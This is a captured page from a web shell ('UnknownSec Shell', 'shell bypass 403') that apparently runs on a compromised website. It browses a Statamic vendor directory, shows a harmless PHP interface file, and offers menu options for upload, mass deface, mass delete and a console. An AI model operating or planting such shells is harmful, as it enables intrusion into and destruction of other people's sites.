shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Contracts
/
Auth
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
RoleRepository.php
<?php namespace Statamic\Contracts\Auth; use Illuminate\Support\Collection; interface RoleRepository { public function all(): Collection; public function find(string $id): ?Role; public function exists(string $id): bool; public function make(?string $handle = null): Role; }
© 2026 UnknownSec